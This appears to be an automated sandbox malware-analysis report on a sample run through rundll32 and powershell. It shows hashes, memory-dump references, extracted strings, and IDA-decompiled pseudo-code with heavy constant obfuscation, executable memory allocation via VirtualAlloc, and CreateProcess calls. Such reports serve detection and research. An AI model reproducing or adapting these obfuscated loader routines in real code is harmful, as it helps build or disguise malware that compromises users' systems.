Opcode ID: f38ac2992bf55804361e0a24cb54bd70c6b407fc2d89915fe1a3a9688d7a4368
Instruction ID: 8232a9e509e12b3b115b49d01927ed4d22cf0b5638e20804d55207183e87677b
Opcode Fuzzy Hash: f38ac2992bf55804361e0a24cb54bd70c6b407fc2d89915fe1a3a9688d7a4368
Instruction Fuzzy Hash: FE01935184E3D24FD30357745D2A6917FB0AF53214F0E46DBD8C5CE0A3E6190A9AC363

Uniqueness

Uniqueness Score: -1.00%

Function 000007FF00272D9A, Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2339103107.000007FF00270000.00000040.00000001.sdmp, Offset: 000007FF00270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff00270000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2454d5d8f0419372a1d0fce9fa099f1ed319f362891c029a770267a50252b5fa
Instruction ID: b6f1f7351f461e168d4eae13bdadf5b7f16a7086471fbcd0dc545139197a3c52
Opcode Fuzzy Hash: 2454d5d8f0419372a1d0fce9fa099f1ed319f362891c029a770267a50252b5fa
Instruction Fuzzy Hash: B1E02010719C0B0FFBF4A66CA41E3F473C1E755313F500076E80CC22A2DD19D9444381

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 2940 Parent PID: 3016 rundll32.exeCOMMON

Execution Graph

Execution Coverage:	1.7%
Dynamic/Decrypted Code Coverage:	15.1%
Signature Coverage:	28.8%
Total number of Nodes:	73
Total number of Limit Nodes:	5

Executed Functions

Function 0044A0F1, Relevance: 20.4, Strings: 16, Instructions: 365
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 91%

			E0044A0F1() {
				char _v520;
				char _v1040;
				char _v1560;
				signed int _v1564;
				intOrPtr _v1568;
				intOrPtr _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _t405;
				signed short* _t412;
				signed int* _t413;
				signed int _t415;
				signed int _t416;
				signed int _t417;
				signed int _t418;
				signed int _t419;
				signed int _t420;
				signed int _t421;
				signed int _t422;
				signed int _t428;
				signed int* _t457;
				void* _t458;
				signed int _t462;
				signed short* _t465;
				signed int* _t466;

				_t466 =  &_v1732;
				_v1572 = 0x462649;
				_v1568 = 0x666e6d;
				_t413 = 0;
				_v1564 = 0;
				_v1636 = 0x6ea1;
				_v1636 = _v1636 | 0xcaeb1c54;
				_v1636 = _v1636 * 0x44;
				_t458 = 0x1c8a6667;
				_v1636 = _v1636 ^ 0xe68db93d;
				_v1700 = 0x9ea9;
				_v1700 = _v1700 << 0xa;
				_t462 = 0x2b;
				_t415 = 0x23;
				_v1700 = _v1700 * 0x64;
				_v1700 = _v1700 >> 0xc;
				_v1700 = _v1700 ^ 0x000f2063;
				_v1668 = 0xf2a5;
				_v1668 = _v1668 ^ 0x17163b96;
				_v1668 = _v1668 ^ 0xad5f2e4e;
				_v1668 = _v1668 ^ 0xba49bcd9;
				_v1624 = 0xe487;
				_v1624 = _v1624 | 0xeb9c80de;
				_v1624 = _v1624 ^ 0xeb9c9144;
				_v1592 = 0x3881;
				_v1592 = _v1592 * 0x6f;
				_v1592 = _v1592 ^ 0x0018105e;
				_v1724 = 0x49ba;
				_v1724 = _v1724 + 0xaf0;
				_v1724 = _v1724 / _t462;
				_v1724 = _v1724 << 6;
				_v1724 = _v1724 ^ 0x00003deb;
				_v1612 = 0xba93;
				_v1612 = _v1612 << 0xe;
				_v1612 = _v1612 ^ 0x2ea4e5a5;
				_v1652 = 0x4b77;
				_v1652 = _v1652 | 0x65810647;
				_v1652 = _v1652 >> 4;
				_v1652 = _v1652 ^ 0x065805b9;
				_v1588 = 0xa186;
				_v1588 = _v1588 + 0xb5c;
				_v1588 = _v1588 ^ 0x0000a1c8;
				_v1680 = 0xcda8;
				_v1680 = _v1680 * 0x54;
				_v1680 = _v1680 << 0xa;
				_v1680 = _v1680 ^ 0x0deca729;
				_v1716 = 0x462e;
				_v1716 = _v1716 ^ 0x8d5a910e;
				_v1716 = _v1716 + 0xffff4390;
				_v1716 = _v1716 << 6;
				_v1716 = _v1716 ^ 0x56868d11;
				_v1708 = 0x2567;
				_v1708 = _v1708 << 0x10;
				_v1708 = _v1708 | 0xd57d8b4f;
				_v1708 = _v1708 >> 4;
				_v1708 = _v1708 ^ 0x0f57bf90;
				_v1604 = 0xb0f8;
				_v1604 = _v1604 + 0xffffeab4;
				_v1604 = _v1604 ^ 0x000092c0;
				_v1576 = 0x7d09;
				_v1576 = _v1576 << 1;
				_v1576 = _v1576 ^ 0x0000cf25;
				_v1656 = 0x9d96;
				_v1656 = _v1656 / _t415;
				_v1656 = _v1656 >> 4;
				_v1656 = _v1656 ^ 0x00003825;
				_v1728 = 0xae64;
				_v1728 = _v1728 >> 0x10;
				_t416 = 0x3c;
				_v1728 = _v1728 * 0x3d;
				_v1728 = _v1728 * 0x64;
				_v1728 = _v1728 ^ 0x0000360d;
				_v1672 = 0x87c;
				_v1672 = _v1672 * 0x4c;
				_v1672 = _v1672 | 0xb9377e8f;
				_v1672 = _v1672 ^ 0xb937fee9;
				_v1596 = 0x755f;
				_v1596 = _v1596 << 3;
				_v1596 = _v1596 ^ 0x0003dbc7;
				_v1580 = 0x3e57;
				_v1580 = _v1580 / _t416;
				_v1580 = _v1580 ^ 0x000011a5;
				_v1732 = 0x638d;
				_v1732 = _v1732 ^ 0xa21d193e;
				_v1732 = _v1732 ^ 0x99b9aab2;
				_v1732 = _v1732 << 0xa;
				_v1732 = _v1732 ^ 0x93405e44;
				_v1644 = 0x6fb3;
				_v1644 = _v1644 >> 0xe;
				_v1644 = _v1644 >> 0xa;
				_v1644 = _v1644 ^ 0x00001043;
				_v1584 = 0x2384;
				_v1584 = _v1584 | 0x2b24236c;
				_v1584 = _v1584 ^ 0x2b240980;
				_v1664 = 0xc490;
				_v1664 = _v1664 + 0xffffef59;
				_t417 = 0x46;
				_v1664 = _v1664 * 0x1f;
				_v1664 = _v1664 ^ 0x0015d474;
				_v1676 = 0x3daf;
				_v1676 = _v1676 * 0x74;
				_v1676 = _v1676 << 0x10;
				_v1676 = _v1676 ^ 0xf34c4f53;
				_v1684 = 0x7c37;
				_v1684 = _v1684 << 0x10;
				_v1684 = _v1684 ^ 0xee095b2d;
				_v1684 = _v1684 ^ 0x923e0ee4;
				_v1688 = 0xf4a0;
				_v1688 = _v1688 ^ 0x2a95b5f1;
				_v1688 = _v1688 | 0x3f378004;
				_v1688 = _v1688 ^ 0x3fb7c4e0;
				_v1720 = 0x3554;
				_v1720 = _v1720 + 0xcba6;
				_v1720 = _v1720 / _t417;
				_t418 = 0x29;
				_v1720 = _v1720 * 0x6e;
				_v1720 = _v1720 ^ 0x00018d2b;
				_v1692 = 0xb003;
				_v1692 = _v1692 * 0x21;
				_v1692 = _v1692 / _t418;
				_v1692 = _v1692 ^ 0x0000dafa;
				_v1608 = 0x9556;
				_v1608 = _v1608 << 6;
				_v1608 = _v1608 ^ 0x0025285b;
				_v1712 = 0x7c63;
				_v1712 = _v1712 + 0xd61;
				_v1712 = _v1712 | 0xf93ff987;
				_v1712 = _v1712 + 0xffff3f2f;
				_v1712 = _v1712 ^ 0xf93f3a22;
				_v1616 = 0xf4ab;
				_t419 = 6;
				_v1616 = _v1616 * 0x6e;
				_v1616 = _v1616 ^ 0x00690dca;
				_v1620 = 0x70bb;
				_v1620 = _v1620 + 0x70ef;
				_v1620 = _v1620 ^ 0x0000b67e;
				_v1704 = 0x2bc1;
				_v1704 = _v1704 << 7;
				_v1704 = _v1704 >> 8;
				_v1704 = _v1704 >> 5;
				_v1704 = _v1704 ^ 0x000077dd;
				_v1648 = 0x7a74;
				_v1648 = _v1648 + 0xffff7142;
				_v1648 = _v1648 + 0xffff0d10;
				_v1648 = _v1648 ^ 0xfffe8588;
				_v1660 = 0x319c;
				_v1660 = _v1660 / _t419;
				_v1660 = _v1660 + 0xffff3bc4;
				_v1660 = _v1660 ^ 0xffff411a;
				_v1632 = 0x6a97;
				_v1632 = _v1632 / _t462;
				_v1632 = _v1632 + 0xf6cf;
				_v1632 = _v1632 ^ 0x0000a388;
				_v1640 = 0x6bc7;
				_t420 = 0x28;
				_v1640 = _v1640 / _t420;
				_t421 = 0x51;
				_v1640 = _v1640 / _t421;
				_v1640 = _v1640 ^ 0x000021dd;
				_v1628 = 0x3b39;
				_v1628 = _v1628 | 0xa29391b9;
				_v1628 = _v1628 ^ 0xa293ed86;
				_v1600 = 0xe9c9;
				_v1600 = _v1600 + 0xffff6249;
				_v1600 = _v1600 ^ 0x000034d4;
				_v1696 = 0xf82d;
				_v1696 = _v1696 << 0xc;
				_v1696 = _v1696 + 0xffffa8ef;
				_t422 = 0x63;
				_t465 = _v1628;
				_v1696 = _v1696 / _t422;
				_v1696 = _v1696 ^ 0x002844a7;
				while(_t458 != 0x441c66b) {
					if(_t458 == 0x6f1be5d) {
						_push(0x4314a4);
						_push(_v1588);
						_push(_v1652);
						_t405 = E00437F4B( &_v1560, _v1680, E00435DFC(_v1724, _v1612, __eflags), _v1716, _v1708); // executed
						asm("sbb edi, edi");
						_t422 = _v1604;
						_t458 = ( ~_t405 & 0xd90426a5) + 0x2b3d9fc6;
						E00440D6D(_t422, _v1576, _v1656, _t404);
						_t466 =  &(_t466[8]);
						goto L20;
					} else {
						if(_t458 == 0x1c8a6667) {
							_t422 = _v1700;
							E00435755(_t422,  &_v1560, _v1668, _v1624, 0x208);
							_t466 =  &(_t466[3]);
							_t458 = 0x289b3cf5;
							continue;
						} else {
							if(_t458 == 0x289b3cf5) {
								_t465 = E00440DC5();
								_t458 = 0x3ab6a711;
								continue;
							} else {
								if(_t458 == 0x2c7788d8) {
									_push(_t413);
									_push(_t465);
									_push(_v1696);
									_push(_v1600);
									_push(_v1628);
									_push(_v1640);
									_push(_t413);
									_push(_t413);
									E00436417(_v1632, __eflags);
									_t413 = 1;
									__eflags = 1;
								} else {
									if(_t458 != 0x3ab6a711) {
										L20:
										__eflags = _t458 - 0x2b3d9fc6;
										if(__eflags != 0) {
											continue;
										} else {
										}
									} else {
										_t412 = _t465;
										if( *_t465 != _t413) {
											do {
												if( *_t412 == 0x2c) {
													_t457 =  &_v1560;
													while(1) {
														_t412 =  &(_t412[1]);
														_t428 =  *_t412 & 0x0000ffff;
														if(_t428 == 0) {
															break;
														}
														__eflags = _t428 - 0x20;
														if(__eflags != 0) {
															 *_t457 = _t428;
															_t457 =  &(_t457[0]);
															__eflags = _t457;
															continue;
														}
														break;
													}
													_t422 = 0;
													 *_t457 = 0;
												}
												_t412 =  &(_t412[1]);
											} while ( *_t412 != _t413);
										}
										_t458 = 0x6f1be5d;
										continue;
									}
								}
							}
						}
					}
					return _t413;
				}
				_push(_t422);
				E0043471A(_v1636,  &_v520, _v1728, _v1672, _v1596, _v1580, _v1732); // executed
				E0043DFD8(_v1644,  &_v1040, __eflags, _v1584, _v1664);
				_push(0x4314d4);
				_push(_v1720);
				_push(_v1688);
				E0043A4D7(__eflags, _v1608, _v1712, _v1616, _v1620, E00435DFC(_v1676, _v1684, __eflags),  &_v520, _t465,  &_v1040);
				_t422 = _v1704;
				E00440D6D(_t422, _v1648, _v1660, _t399);
				_t466 =  &(_t466[0x17]);
				_t458 = 0x2c7788d8;
				goto L20;
			}

0x0044a0f1
0x0044a0f7
0x0044a104
0x0044a110
0x0044a112
0x0044a119
0x0044a121
0x0044a133
0x0044a137
0x0044a13c
0x0044a144
0x0044a14c
0x0044a156
0x0044a159
0x0044a15a
0x0044a15e
0x0044a163
0x0044a16b
0x0044a173
0x0044a17b
0x0044a183
0x0044a18b
0x0044a193
0x0044a19b
0x0044a1a3
0x0044a1b6
0x0044a1bd
0x0044a1c8
0x0044a1d0
0x0044a1e0
0x0044a1e4
0x0044a1e9
0x0044a1f1
0x0044a1fc
0x0044a204
0x0044a20f
0x0044a217
0x0044a21f
0x0044a224
0x0044a22c
0x0044a237
0x0044a242
0x0044a24d
0x0044a25a
0x0044a25e
0x0044a263
0x0044a26b
0x0044a273
0x0044a27b
0x0044a283
0x0044a288
0x0044a290
0x0044a298
0x0044a29d
0x0044a2a5
0x0044a2aa
0x0044a2b2
0x0044a2bd
0x0044a2c8
0x0044a2d3
0x0044a2de
0x0044a2e5
0x0044a2f0
0x0044a2fe
0x0044a302
0x0044a307
0x0044a30f
0x0044a319
0x0044a325
0x0044a328
0x0044a331
0x0044a335
0x0044a33d
0x0044a34a
0x0044a34e
0x0044a356
0x0044a35e
0x0044a369
0x0044a371
0x0044a37c
0x0044a392
0x0044a399
0x0044a3a4
0x0044a3ac
0x0044a3b4
0x0044a3bc
0x0044a3c1
0x0044a3c9
0x0044a3d1
0x0044a3d6
0x0044a3db
0x0044a3e3
0x0044a3ee
0x0044a3f9
0x0044a404
0x0044a40c
0x0044a419
0x0044a41c
0x0044a420
0x0044a428
0x0044a435
0x0044a439
0x0044a43e
0x0044a446
0x0044a44e
0x0044a453
0x0044a45b
0x0044a463
0x0044a46b
0x0044a473
0x0044a47b
0x0044a483
0x0044a48b
0x0044a49b
0x0044a4a4
0x0044a4a5
0x0044a4a9
0x0044a4b1
0x0044a4be
0x0044a4c8
0x0044a4cc
0x0044a4d4
0x0044a4df
0x0044a4e7
0x0044a4f2
0x0044a4fa
0x0044a502
0x0044a50a
0x0044a512
0x0044a51c
0x0044a531
0x0044a534
0x0044a53b
0x0044a546
0x0044a551
0x0044a55c
0x0044a567
0x0044a56f
0x0044a574
0x0044a579
0x0044a57e
0x0044a586
0x0044a58e
0x0044a596
0x0044a59e
0x0044a5a6
0x0044a5b6
0x0044a5ba
0x0044a5c2
0x0044a5ca
0x0044a5da
0x0044a5de
0x0044a5e6
0x0044a5ee
0x0044a5fa
0x0044a5ff
0x0044a609
0x0044a60e
0x0044a614
0x0044a61c
0x0044a624
0x0044a62c
0x0044a634
0x0044a63f
0x0044a64a
0x0044a655
0x0044a65d
0x0044a662
0x0044a66e
0x0044a671
0x0044a675
0x0044a679
0x0044a681
0x0044a693
0x0044a74b
0x0044a750
0x0044a757
0x0044a781
0x0044a796
0x0044a798
0x0044a7a5
0x0044a7ab
0x0044a7b0
0x00000000
0x0044a699
0x0044a69f
0x0044a735
0x0044a739
0x0044a73e
0x0044a741
0x00000000
0x0044a6a1
0x0044a6a7
0x0044a712
0x0044a714
0x00000000
0x0044a6a9
0x0044a6af
0x0044a883
0x0044a884
0x0044a885
0x0044a889
0x0044a890
0x0044a897
0x0044a8a5
0x0044a8a6
0x0044a8a7
0x0044a8b1
0x0044a8b1
0x0044a6b5
0x0044a6bb
0x0044a875
0x0044a875
0x0044a87b
0x00000000
0x00000000
0x0044a881
0x0044a6c1
0x0044a6c1
0x0044a6c7
0x0044a6c9
0x0044a6cd
0x0044a6cf
0x0044a6e4
0x0044a6e4
0x0044a6e7
0x0044a6ed
0x00000000
0x00000000
0x0044a6d8
0x0044a6dc
0x0044a6de
0x0044a6e1
0x0044a6e1
0x00000000
0x0044a6e1
0x00000000
0x0044a6dc
0x0044a6ef
0x0044a6f1
0x0044a6f1
0x0044a6f4
0x0044a6f7
0x0044a6c9
0x0044a6fc
0x00000000
0x0044a6fc
0x0044a6bb
0x0044a6af
0x0044a6a7
0x0044a69f
0x0044a8be
0x0044a8be
0x0044a7b8
0x0044a7e2
0x0044a800
0x0044a805
0x0044a80a
0x0044a80e
0x0044a850
0x0044a864
0x0044a868
0x0044a86d
0x0044a870
0x00000000

Strings

%8, xrefs: 0044A307
-[, xrefs: 0044A453
mnf, xrefs: 0044A104
W>, xrefs: 0044A37C
9;, xrefs: 0044A61C
tz, xrefs: 0044A586
6, xrefs: 0044A335
g%, xrefs: 0044A290
[(%, xrefs: 0044A4E7
wK, xrefs: 0044A20F
_u, xrefs: 0044A35E
T5, xrefs: 0044A483
a, xrefs: 0044A4FA
I&F, xrefs: 0044A0F7
p, xrefs: 0044A551
l#$+, xrefs: 0044A3EE

Memory Dump Source

Source File: 00000007.00000002.2330983345.0000000000430000.00000040.00020000.sdmp, Offset: 00430000, based on PE: true

Associated: 00000007.00000002.2331018367.0000000000450000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2331022756.0000000000452000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_430000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 6$%8$-[$9;$I&F$T5$W>$[(%$_u$a$g%$l#$+$mnf$tz$wK$p
API String ID: 0-3673879503
Opcode ID: 8b4c4899e25836a6e513f7b7099ee16bfe4ced8b22ed2c181f36f04c7b33ff36
Instruction ID: c60e9049d5afa7f789aa9d4a12f6dda564976e1184a4df7f4283971bfd446f19
Opcode Fuzzy Hash: 8b4c4899e25836a6e513f7b7099ee16bfe4ced8b22ed2c181f36f04c7b33ff36
Instruction Fuzzy Hash: B6121071508380DFE368CF65C48AA4BFBE1BBC4748F10891EE1D9862A0D7B98959CF47

Uniqueness

Uniqueness Score: -1.00%

Function 00436417, Relevance: .2, Instructions: 181
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 22%

			E00436417(void* __edx, void* __eflags) {
				void* _t197;
				void* _t213;
				void* _t214;
				signed int _t218;
				signed int _t219;
				signed int _t220;
				intOrPtr _t234;
				intOrPtr _t237;
				void* _t240;
				void* _t241;

				_t240 = _t241 - 0x58;
				_push( *((intOrPtr*)(_t240 + 0x7c)));
				_t234 =  *((intOrPtr*)(_t240 + 0x60));
				_push( *((intOrPtr*)(_t240 + 0x78)));
				_push( *((intOrPtr*)(_t240 + 0x74)));
				_push( *((intOrPtr*)(_t240 + 0x70)));
				_push( *((intOrPtr*)(_t240 + 0x6c)));
				_push( *((intOrPtr*)(_t240 + 0x68)));
				_push( *((intOrPtr*)(_t240 + 0x64)));
				_push(_t234);
				_push(__edx);
				_push(0);
				E00442550(_t197);
				 *(_t240 + 0x2c) = 0x767b;
				_t218 = 0x49;
				 *(_t240 + 0x2c) =  *(_t240 + 0x2c) * 0x7f;
				 *(_t240 + 0x2c) =  *(_t240 + 0x2c) / _t218;
				 *(_t240 + 0x2c) =  *(_t240 + 0x2c) ^ 0x0000f87c;
				 *(_t240 + 0x4c) = 0xef21;
				_t219 = 0x58;
				 *(_t240 + 0x4c) =  *(_t240 + 0x4c) * 0x51;
				 *(_t240 + 0x4c) =  *(_t240 + 0x4c) << 7;
				 *(_t240 + 0x4c) =  *(_t240 + 0x4c) ^ 0xa17ee643;
				 *(_t240 + 0x4c) =  *(_t240 + 0x4c) ^ 0x84aa5f32;
				 *(_t240 + 0x34) = 0x6d8e;
				 *(_t240 + 0x34) =  *(_t240 + 0x34) | 0x6849a982;
				 *(_t240 + 0x34) =  *(_t240 + 0x34) + 0xc220;
				 *(_t240 + 0x34) =  *(_t240 + 0x34) + 0xffff3440;
				 *(_t240 + 0x34) =  *(_t240 + 0x34) ^ 0x6849f13e;
				 *(_t240 + 0x1c) = 0xa45f;
				 *(_t240 + 0x1c) =  *(_t240 + 0x1c) ^ 0x8ac4df42;
				 *(_t240 + 0x1c) =  *(_t240 + 0x1c) ^ 0x8ac417ac;
				 *(_t240 + 0x48) = 0x404a;
				 *(_t240 + 0x48) =  *(_t240 + 0x48) >> 0xa;
				 *(_t240 + 0x48) =  *(_t240 + 0x48) / _t219;
				 *(_t240 + 0x48) =  *(_t240 + 0x48) + 0xffff6f8b;
				 *(_t240 + 0x48) =  *(_t240 + 0x48) ^ 0xffff405a;
				 *(_t240 + 0x50) = 0x54f1;
				 *(_t240 + 0x50) =  *(_t240 + 0x50) << 0xb;
				 *(_t240 + 0x50) =  *(_t240 + 0x50) + 0x3a90;
				 *(_t240 + 0x50) =  *(_t240 + 0x50) << 9;
				 *(_t240 + 0x50) =  *(_t240 + 0x50) ^ 0x4f85421e;
				 *(_t240 + 0x54) = 0x8597;
				 *(_t240 + 0x54) =  *(_t240 + 0x54) << 8;
				 *(_t240 + 0x54) =  *(_t240 + 0x54) | 0xa9f146ed;
				 *(_t240 + 0x54) =  *(_t240 + 0x54) >> 5;
				 *(_t240 + 0x54) =  *(_t240 + 0x54) ^ 0x054fb0bb;
				 *(_t240 + 0x44) = 0x73dc;
				 *(_t240 + 0x44) =  *(_t240 + 0x44) * 0x3b;
				 *(_t240 + 0x44) =  *(_t240 + 0x44) + 0xa50b;
				 *(_t240 + 0x44) =  *(_t240 + 0x44) ^ 0x812a8e6b;
				 *(_t240 + 0x44) =  *(_t240 + 0x44) ^ 0x8131b455;
				 *(_t240 + 0x14) = 0x8d69;
				 *(_t240 + 0x14) =  *(_t240 + 0x14) << 1;
				 *(_t240 + 0x14) =  *(_t240 + 0x14) ^ 0x00015647;
				 *(_t240 + 8) = 0x519d;
				 *(_t240 + 8) =  *(_t240 + 8) ^ 0xf9151e6a;
				 *(_t240 + 8) =  *(_t240 + 8) ^ 0xf9150c68;
				 *(_t240 + 0x3c) = 0xc74b;
				 *(_t240 + 0x3c) =  *(_t240 + 0x3c) | 0x7e9d0cc5;
				 *(_t240 + 0x3c) =  *(_t240 + 0x3c) + 0xffff6740;
				 *(_t240 + 0x3c) =  *(_t240 + 0x3c) + 0x85e7;
				 *(_t240 + 0x3c) =  *(_t240 + 0x3c) ^ 0x7e9dd5d0;
				 *(_t240 + 0x24) = 0x7835;
				 *(_t240 + 0x24) =  *(_t240 + 0x24) + 0x26c5;
				 *(_t240 + 0x24) =  *(_t240 + 0x24) >> 0x10;
				 *(_t240 + 0x24) =  *(_t240 + 0x24) ^ 0x00005957;
				 *(_t240 + 0x30) = 0xbe83;
				 *(_t240 + 0x30) =  *(_t240 + 0x30) | 0xb98edffe;
				 *(_t240 + 0x30) =  *(_t240 + 0x30) << 8;
				 *(_t240 + 0x30) =  *(_t240 + 0x30) + 0xffff95b5;
				 *(_t240 + 0x30) =  *(_t240 + 0x30) ^ 0x8efff2e6;
				 *(_t240 + 0x38) = 0x2bdc;
				 *(_t240 + 0x38) =  *(_t240 + 0x38) + 0xdf33;
				_t237 = 0x44;
				 *(_t240 + 0x38) =  *(_t240 + 0x38) * 0x50;
				 *(_t240 + 0x38) =  *(_t240 + 0x38) << 7;
				 *(_t240 + 0x38) =  *(_t240 + 0x38) ^ 0x29ba000b;
				 *(_t240 + 0xc) = 0x57cb;
				 *(_t240 + 0xc) =  *(_t240 + 0xc) + 0x1cd9;
				 *(_t240 + 0xc) =  *(_t240 + 0xc) ^ 0x00006426;
				 *(_t240 + 0x40) = 0x6f55;
				 *(_t240 + 0x40) =  *(_t240 + 0x40) | 0x563c3ba0;
				 *(_t240 + 0x40) =  *(_t240 + 0x40) << 0xd;
				 *(_t240 + 0x40) =  *(_t240 + 0x40) + 0xfffff8ef;
				 *(_t240 + 0x40) =  *(_t240 + 0x40) ^ 0x8ffe8da5;
				 *(_t240 + 0x20) = 0x40d0;
				 *(_t240 + 0x20) =  *(_t240 + 0x20) * 0x75;
				 *(_t240 + 0x20) =  *(_t240 + 0x20) ^ 0x609dd8a9;
				 *(_t240 + 0x20) =  *(_t240 + 0x20) ^ 0x608076c4;
				 *(_t240 + 0x28) = 0x4853;
				 *(_t240 + 0x28) =  *(_t240 + 0x28) ^ 0x8def0e3c;
				 *(_t240 + 0x28) =  *(_t240 + 0x28) << 2;
				 *(_t240 + 0x28) =  *(_t240 + 0x28) ^ 0x37bd1438;
				 *(_t240 + 0x10) = 0x42ee;
				 *(_t240 + 0x10) =  *(_t240 + 0x10) * 0x60;
				 *(_t240 + 0x10) =  *(_t240 + 0x10) ^ 0x00197620;
				 *(_t240 + 0x18) = 0x469;
				 *(_t240 + 0x18) =  *(_t240 + 0x18) * 0x15;
				 *(_t240 + 0x18) =  *(_t240 + 0x18) ^ 0x00003a34;
				_t220 =  *(_t240 + 0x2c);
				E00435755(_t220, _t240 - 0x4c,  *(_t240 + 0x4c),  *(_t240 + 0x34), _t237);
				 *((intOrPtr*)(_t240 - 0x4c)) = _t237;
				_push( *(_t240 + 0x24));
				_push(_t220);
				_push(_t240 - 0x4c);
				_push( *(_t240 + 0x3c));
				_push( *((intOrPtr*)(_t240 + 0x64)));
				_push( *(_t240 + 8));
				_push( *(_t240 + 0x14));
				_push(_t240 - 8);
				_push( *((intOrPtr*)(_t240 + 0x78)));
				_push(_t220);
				_push( *(_t240 + 0x44));
				_push( *(_t240 + 0x54));
				_push( *(_t240 + 0x50));
				_push( *(_t240 + 0x48));
				_t213 = E0044B86E( *((intOrPtr*)(_t240 + 0x7c)),  *(_t240 + 0x1c)); // executed
				if(_t213 == 0) {
					_t214 = 0;
				} else {
					if(_t234 == 0) {
						E0043F1ED( *(_t240 + 0x30),  *(_t240 + 0x38),  *(_t240 + 0xc),  *(_t240 + 0x40),  *((intOrPtr*)(_t240 - 8)));
						E0043F1ED( *(_t240 + 0x20),  *(_t240 + 0x28),  *(_t240 + 0x10),  *(_t240 + 0x18),  *((intOrPtr*)(_t240 - 4)));
					} else {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
					}
					_t214 = 1;
				}
				return _t214;
			}

0x00436418
0x00436424
0x00436427
0x0043642a
0x0043642d
0x00436430
0x00436433
0x00436436
0x00436439
0x0043643c
0x0043643d
0x0043643e
0x00436440
0x00436445
0x00436454
0x00436457
0x00436461
0x00436464
0x0043646b
0x00436476
0x00436477
0x0043647a
0x0043647e
0x00436485
0x0043648c
0x00436493
0x0043649a
0x004364a1
0x004364a8
0x004364af
0x004364b6
0x004364bd
0x004364c4
0x004364cb
0x004364d4
0x004364d7
0x004364de
0x004364e5
0x004364ec
0x004364f0
0x004364f7
0x004364fb
0x00436502
0x00436509
0x0043650d
0x00436514
0x00436518
0x0043651f
0x0043652a
0x0043652d
0x00436534
0x0043653b
0x00436542
0x00436549
0x0043654c
0x00436553
0x0043655a
0x00436561
0x00436568
0x0043656f
0x00436576
0x0043657d
0x00436584
0x0043658b
0x00436592
0x00436599
0x0043659d
0x004365a4
0x004365ab
0x004365b2
0x004365b9
0x004365c0
0x004365c7
0x004365ce
0x004365db
0x004365dd
0x004365e0
0x004365e4
0x004365eb
0x004365f2
0x004365f9
0x00436600
0x00436607
0x0043660e
0x00436612
0x00436619
0x00436620
0x0043662b
0x0043662e
0x00436635
0x0043663c
0x00436643
0x0043664a
0x0043664e
0x00436655
0x00436660
0x00436663
0x0043666a
0x00436675
0x00436678
0x00436685
0x00436688
0x00436690
0x00436696
0x00436699
0x0043669a
0x0043669b
0x004366a1
0x004366a4
0x004366a7
0x004366aa
0x004366ae
0x004366b1
0x004366b2
0x004366b8
0x004366bb
0x004366be
0x004366c4
0x004366ce
0x0043670d
0x004366d0
0x004366d2
0x004366ef
0x00436703
0x004366d4
0x004366d7
0x004366d8
0x004366d9
0x004366da
0x004366da
0x004366dd
0x004366dd
0x00436715

Memory Dump Source

Source File: 00000007.00000002.2330983345.0000000000430000.00000040.00020000.sdmp, Offset: 00430000, based on PE: true

Associated: 00000007.00000002.2331018367.0000000000450000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2331022756.0000000000452000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_430000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 1bb1d0a9ce0f6d895f827a8d88b19ef494e72e3d5b923de3fddf5965c7bef492
Instruction ID: 4762d4375d8fa1e8e5dc17a4b3c4e7b071735080be243beb295943494bf6558d
Opcode Fuzzy Hash: 1bb1d0a9ce0f6d895f827a8d88b19ef494e72e3d5b923de3fddf5965c7bef492
Instruction Fuzzy Hash: CC91F371400649EBDF59CF64C94A8CE3FA1FF04358F519219FE2696160D3BAC999CF84

Uniqueness

Uniqueness Score: -1.00%

Function 00493928, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 136
filememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetEnhMetaFileA.GDI32(trty55345), ref: 004939C2
VirtualAlloc.KERNELBASE(00000000,00496CB4,00001000,00000040), ref: 00493A8E

Strings

trty55345, xrefs: 004939BD
|lI, xrefs: 00493961

Memory Dump Source

Source File: 00000007.00000002.2331029557.0000000000453000.00000020.00020000.sdmp, Offset: 00453000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_453000_rundll32.jbxd

Similarity

API ID: AllocFileMetaVirtual
String ID: trty55345$|lI
API String ID: 2643768156-2335613212
Opcode ID: 26e27a72521c242bea1a68a5874f1780c353483e9f122b7e29b3f95027a1af77
Instruction ID: 1f1aaf7a3fed1d7a8e05d554f4cfe38acf399607a60e39ae21c9bb998a08ce87
Opcode Fuzzy Hash: 26e27a72521c242bea1a68a5874f1780c353483e9f122b7e29b3f95027a1af77
Instruction Fuzzy Hash: 2261C274601200AFE740DF29ED86A093BA1F729359B12843BF5899B371DF79A844CF0C

Uniqueness

Uniqueness Score: -1.00%

